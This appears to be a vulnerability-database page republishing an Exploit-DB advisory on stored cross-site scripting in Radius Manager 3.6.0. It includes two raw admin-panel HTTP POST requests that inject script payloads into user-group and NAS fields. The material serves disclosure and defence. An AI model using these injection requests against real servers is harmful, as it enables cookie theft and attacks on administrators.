header-logo
Suggest Exploit
vendor:
Radius Manager
by:
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Radius Manager
Affected Version From: 3.6.2000
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting Vulnerabilities in Radius Manager

Radius Manager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input and implement proper output encoding.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45481/info

Radius Manager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Radius Manager 3.6.0 is vulnerable; other versions may also be affected

http:///admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http:///admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS

Navigation

Suggest Exploit

Services By CQR